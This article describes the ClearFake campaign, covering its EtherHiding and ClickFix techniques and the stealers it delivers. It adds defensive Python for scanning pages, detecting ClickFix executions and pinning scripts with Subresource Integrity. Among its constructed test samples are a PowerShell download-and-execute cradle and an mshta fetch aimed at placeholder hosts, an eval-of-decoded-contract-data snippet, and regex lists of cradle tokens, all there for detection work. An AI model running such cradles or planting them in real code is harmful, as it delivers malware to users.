The ClearFake campaign is spreading quickly by tricking users with fake security verifications. More than 9,300 websites are now compromised. Its operators use fake reCAPTCHA and Cloudflare Turnstile pop-ups that look genuine but exist only to deliver information stealers such as Lumma and Vidar.
ClearFake first surfaced in mid-2023. It started by placing fake browser update alerts on compromised WordPress sites. Since then, the attack method has evolved.
It now uses a technique called EtherHiding, which stores the next-stage JavaScript inside Binance Smart Chain (BSC) smart contracts. The infected page reads that code from the chain when it loads, so there is no malicious file on the web server to find, and the operators can swap the payload on-chain without touching the compromised site again. That makes it harder to detect and effectively impossible to take down at the hosting layer.
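A site owner cleaning up after a compromise needs a way to spot an EtherHiding-style injection in their own pages. The scanner below is an added example written for this article, not ClearFake's injected script: it pulls every script element out of a page and flags those that both reach a BSC RPC endpoint or web3 provider and then turn the fetched string back into code. The indicator lists are heuristics chosen here, the sample page is constructed, and the contract address in it is a placeholder.

```python
"""Static scan of a page's scripts for EtherHiding-style code loading.

Added example, not ClearFake's injected script. The indicator lists are
heuristics chosen for this example; the sample page is constructed, and the
contract address in it is an all-zero placeholder, not a real contract.
"""
import re
from html.parser import HTMLParser

# Signs that a script talks to the BNB/Binance Smart Chain or a web3 provider.
CHAIN_RE = re.compile(
    r"bsc-dataseed|binance\.org|bnbchain|web3(?:\.min)?\.js|new\s+Web3\(|ethers\."
    r"|eth_call|\.methods\.\w+\(.*?\)\.call\(",
    re.IGNORECASE | re.DOTALL,
)
# Signs that a fetched string is decoded and executed, or injected into the DOM.
EXEC_RE = re.compile(
    r"\beval\(|new\s+Function\(|\batob\(|document\.write\(|createElement\(\s*['\"]script['\"]",
    re.IGNORECASE,
)


class _ScriptCollector(HTMLParser):
    """Collect (src, inline_text) for every <script> element on the page."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            self._in_script = True
            self._src = dict(attrs).get("src")
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.scripts.append((self._src, "".join(self._buf)))
            self._in_script = False


def scan_page(html: str) -> list[dict]:
    """Return one finding per script that both reaches the chain and executes what it fetched."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for index, (src, body) in enumerate(collector.scripts):
        text = (src or "") + "\n" + body
        chain = sorted({m.group(0).lower() for m in CHAIN_RE.finditer(text)})
        execs = sorted({m.group(0).lower() for m in EXEC_RE.finditer(text)})
        # A library include alone, or a dapp that only displays a contract read,
        # trips one list but not both; the injection pattern trips both.
        if chain and execs:
            findings.append({"script": index, "src": src, "chain": chain, "exec": execs})
    return findings


# Constructed sample page (not a real capture). Hostnames use .invalid.
SAMPLE_PAGE = """<!doctype html><html><head>
<script src="https://cdn.example.invalid/web3.min.js"></script>
<script>
  // ordinary site code: no chain access, no dynamic execution
  document.addEventListener('DOMContentLoaded', function () {
    document.querySelector('#year').textContent = new Date().getFullYear();
  });
</script>
</head><body>
<script>
  // legitimate dapp-style read: talks to the chain but only displays the result
  var w3 = new Web3("https://bsc-dataseed.binance.org/");
  var c = new w3.eth.Contract(ABI, "0x0000000000000000000000000000000000000000");
  c.methods.balanceOf(user).call().then(function (v) { show.textContent = v; });
</script>
<script>
  // EtherHiding-style pattern (constructed; placeholder address; no real payload):
  // read a string from a contract, decode it and run it as code
  var p = new Web3("https://bsc-dataseed.binance.org/");
  var k = new p.eth.Contract(ABI, "0x0000000000000000000000000000000000000000");
  k.methods.get().call().then(function (r) { eval(atob(r)); });
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_page(SAMPLE_PAGE):
        print(f"script #{f['script']} src={f['src']}: chain={f['chain']} exec={f['exec']}")
```

Run it against a saved copy of each page template and any cached theme or plugin files; a hit on a script you did not write is a strong signal. The two-list rule keeps a genuine dapp or a bare web3 library include from being flagged, but it is static analysis only: obfuscated or string-built identifiers will slip past it, so treat a clean result as a first pass, not a clean bill of health.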
The goal is to trick users into running a harmful command themselves, usually PowerShell on Windows. That command downloads information-stealing malware; the campaign has targeted both Windows and macOS users.
In 2024 the campaign adopted a new trick called ClickFix: a fake error or verification message that urges the user to "fix" a made-up problem by copying a command and pasting it into the Windows Run dialog or a terminal. The command placed on the clipboard is the infection itself, so the victim launches the malware with their own hands.
Researchers found that the injected script uses the Application Binary Interface (ABI) of BSC smart contracts to call contract functions whose return value is JavaScript. That JavaScript fingerprints the visitor's system and fetches further code.
That code contains the fake ClickFix prompt. If a user follows it, the Emmenhtal Loader (also known as PEAKLIGHT) is installed, which then drops Lumma Stealer. In another case, the chain delivered Vidar Stealer instead. The attackers constantly update their code and lures, making detection difficult.
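Because the victim types or pastes the command themselves, the endpoint is where a ClickFix infection is easiest to catch: a script host spawned by the desktop shell with a download cradle on its command line. The detector below is an added example written for this article, not ClearFake's code or anyone's shipped detection rule. The record layout (Image, ParentImage, CommandLine, ProcessId) is an assumption modelled on Sysmon Event ID 1, the cradle token list is a heuristic chosen here, and the sample events are constructed.

```python
"""Detect ClickFix-style copy-paste executions in process-creation telemetry.

Added example, not ClearFake code. The record layout (Image, ParentImage,
CommandLine, ProcessId) is an assumption modelled on Sysmon Event ID 1; the
sample events at the bottom are constructed, not captured from a real host.
"""
import re

# A ClickFix lure tells the victim to open Win+R (or a console) and paste, so
# the script host is a child of the desktop shell rather than a service or job.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute cradle fragments typical of pasted one-liners (heuristic list).
CRADLE_RE = re.compile(
    r"\biex\b|invoke-expression|\biwr\b|invoke-webrequest|invoke-restmethod"
    r"|\birm\b|downloadstring|frombase64string|mshta\s+https?://"
    r"|-enc(?:odedcommand)?\b|-w(?:indowstyle)?\s+hidden|-noprofile\b",
    re.IGNORECASE,
)


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.lower().rsplit("\\", 1)[-1].rsplit("/", 1)[-1]


def score_event(event: dict) -> list[str]:
    """Return the reasons one event looks like a ClickFix execution (empty list = clean)."""
    image = _basename(event.get("Image", ""))
    parent = _basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    interactive = image in SCRIPT_HOSTS and parent in INTERACTIVE_PARENTS
    tokens = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmdline)})
    reasons = []
    # Rule: script host spawned by the shell AND at least one cradle token, or a
    # dense cradle (three or more tokens) regardless of the parent process.
    if (interactive and tokens) or len(tokens) >= 3:
        if interactive:
            reasons.append(f"{image} spawned by {parent} (manual paste / Win+R)")
        reasons.append("cradle tokens: " + ", ".join(tokens))
    return reasons


def detect_clickfix(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run score_event over a batch and return (ProcessId, reasons) for each hit."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["ProcessId"], reasons))
    return hits


# Constructed sample telemetry (not real captures). Hostnames use .invalid.
SAMPLE_EVENTS = [
    {"ProcessId": 1001, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://cdn.example.invalid/v | iex"'},
    {"ProcessId": 1002, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},  # a user simply opened a console
    {"ProcessId": 1003, "ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -NoProfile -File C:\scripts\backup.ps1"},  # scheduled job
    {"ProcessId": 1004, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/captcha.hta"},
]

if __name__ == "__main__":
    for pid, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

The parent-process condition is what keeps the rule quiet: an administrator's scheduled PowerShell job (event 1003) carries a cradle-like flag but is not a child of explorer.exe, and a plain interactive console (event 1002) has no cradle at all. The Run dialog also records what was pasted under the RunMRU registry key, so the same token list can be applied to those values during incident response.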
By July 2024, an estimated 200,000 unique users had been exposed to ClearFake lures. More than 100 car dealership websites were also infected at once through a third-party video provider. According to a report, that provider unknowingly served injected code in a script its customers embedded, so a single compromise reached every client site: a classic supply chain attack.
Separately, phishing emails carrying VHD or Excel attachments were seen exploiting old, long-patched vulnerabilities to launch remote access trojans such as Remcos and AsyncRAT.
How to Stay Protected
To prevent ClearFake infections, keep WordPress core, themes and plugins patched and remove the ones you do not use. Treat any reCAPTCHA, Turnstile or browser-update prompt that asks you to copy a command, open the Run dialog or paste something as an attack: genuine verification checks never do that. Use tools that block suspicious scripts and web content, and restrict who can run PowerShell or mshta on user workstations. Pin third-party scripts to a specific, reviewed version (Subresource Integrity hashes do this in the browser) and audit them often.
Educate users about fake update prompts, fake verification pages and other social engineering tricks, and give them one simple rule: never paste a command you did not write into Run or a terminal. Strong access controls and multi-factor authentication (MFA) limit what a stolen password is worth, which matters because the end goal of these chains is an information stealer; since stealers also take session cookies, which can bypass MFA, keep session lifetimes short and revoke sessions after an incident. As threats grow smarter, organizations must stay alert and act quickly. Prevention and awareness are your best defenses.
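The dealership incident above is the case pinning is meant for: a script every customer site embedded changed underneath them. Subresource Integrity (SRI) lets the embedding site commit to a hash of the exact file it reviewed, and the browser refuses to run anything else. The helper below is an added example written for this article, not the video provider's or anyone's shipped code; the script contents are constructed placeholders and the URL uses a .invalid hostname.

```python
"""Pin a third-party script with Subresource Integrity and verify a copy offline.

Added example. The script bytes below are constructed placeholders, not any
vendor's real code, and the URL is a .invalid hostname.
"""
import base64
import hashlib
import hmac

SRI_ALGOS = ("sha256", "sha384", "sha512")  # the only algorithms SRI accepts


def sri_hash(content: bytes, algo: str = "sha384") -> str:
    """Return the integrity value browsers expect: '<algo>-<base64 digest>'."""
    if algo not in SRI_ALGOS:
        raise ValueError("SRI allows sha256, sha384 or sha512 only")
    digest = hashlib.new(algo, content).digest()
    return f"{algo}-{base64.b64encode(digest).decode('ascii')}"


def script_tag(src: str, content: bytes) -> str:
    """Emit the tag the embedding site ships.

    crossorigin="anonymous" is required for SRI on cross-origin loads; without it
    the browser cannot read the response bytes to hash them and blocks the script.
    """
    return (f'<script src="{src}" integrity="{sri_hash(content)}" '
            'crossorigin="anonymous"></script>')


def verify(content: bytes, integrity: str) -> bool:
    """Check a fetched copy against a pinned value (the comparison a browser makes)."""
    algo, sep, _ = integrity.partition("-")
    if not sep or algo not in SRI_ALGOS:
        return False
    return hmac.compare_digest(sri_hash(content, algo), integrity)


# Constructed placeholder script and a tampered copy (not real vendor code).
PINNED = b"/* vendor-player v1.0 (constructed placeholder) */ window.vp = { play: function () {} };"
TAMPERED = PINNED + b"\nloadExtra('https://injected.example.invalid/x.js');"

if __name__ == "__main__":
    tag = script_tag("https://player.example.invalid/player.js", PINNED)
    print(tag)
    print("reviewed copy verifies:", verify(PINNED, sri_hash(PINNED)))
    print("tampered copy verifies:", verify(TAMPERED, sri_hash(PINNED)))
```

Two caveats a practitioner should keep in mind. First, SRI only works when the provider ships a fixed, versioned file; if they push changes to the same URL, the pin breaks and the temptation is to re-pin blindly, which would bless a malicious copy just as readily. Re-pin only after reviewing the new file. Second, the hash covers that one file, not anything it loads afterwards, and it does nothing against the first-party case where the WordPress site itself is compromised.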
Sleep well, we got you covered.